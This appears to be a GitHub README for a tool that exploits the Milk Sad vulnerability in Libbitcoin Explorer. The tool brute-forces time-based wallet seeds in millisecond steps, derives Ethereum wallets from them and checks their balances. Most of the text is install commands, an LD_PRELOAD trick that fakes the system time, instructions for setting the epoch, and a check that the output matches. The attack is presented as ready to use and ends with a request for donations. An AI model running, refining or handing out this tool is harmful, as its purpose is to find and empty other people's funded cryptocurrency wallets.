MILK-SAD-Libbitcoin-vuln-exploit

I saw https://milksad.info/disclosure.html and then did some experiments. I made the automatic program above and added some logic, namely searching in +1 millisecond increments, because that affects the resulting seed. I haven't tried it in nanoseconds or microseconds. If you want to experiment further, you can edit faketime.c above. This program only focuses on ETH and implements a balance check. If you want to run it at a different epoch time, you can edit this section:

   epoch_time = 1608145450000

The value is in millisecond format; the original is 16 December 2020, 13:44:10.000 (UTC).

How to install it

git clone https://github.com/JanetCohen/MILK-SAD-Libbitcoin-vuln-exploit
cd MILK-SAD-Libbitcoin-vuln-exploit
pip install requests
pip install mnemonic
pip install eth_account
pip install bip32utils
gcc -shared -fPIC -o libfaketime_ms.so faketime.c -ldl
chmod +x bxl

a little addition, this file is the vulnerable Libbitcoin Explorer,

Is the program running properly?

If you want to test whether the Python program is really running well, you can try this:

echo "$(date +'%s')$(date +'%3N') - Running command..." && ./bxl seed -b 128 | ./bxl mnemonic-new

This displays the current epoch time, which you can copy. Example output:

1732470374822 - Running command...                             
vicious replace embrace immune chat scan tattoo pottery tomato bridge hurdle turkey

And this bxl is the original libbitcoin program itself without modification.

Add the epoch 1732470374822 here:

export FAKETIME_MS="1732470374822" 

export LD_PRELOAD="./libfaketime.so"

This means you have faked your system time. If you don't do this and just validate in Python, it will show a different seed, because the echo command takes a few milliseconds to print the epoch time. You can prove it by running this command again:

echo "$(date +'%s')$(date +'%3N') - Running command..." && ./bxl seed -b 128 | ./bxl mnemonic-new

If the result is the same as the previous result, it is running correctly.

Then you can validate again in the Python script by changing this on line 50:

epoch_time = 1732470374822

Then run it. Is the result the same again? If it is the same, it runs correctly.

You can reset your system time to its original state with this.

unset LD_PRELOAD
unset FAKETIME_MS

good luck

some vodka : bc1qm3dzv2pkr67d0mknwt2xp95pux3d6kkufym9xr
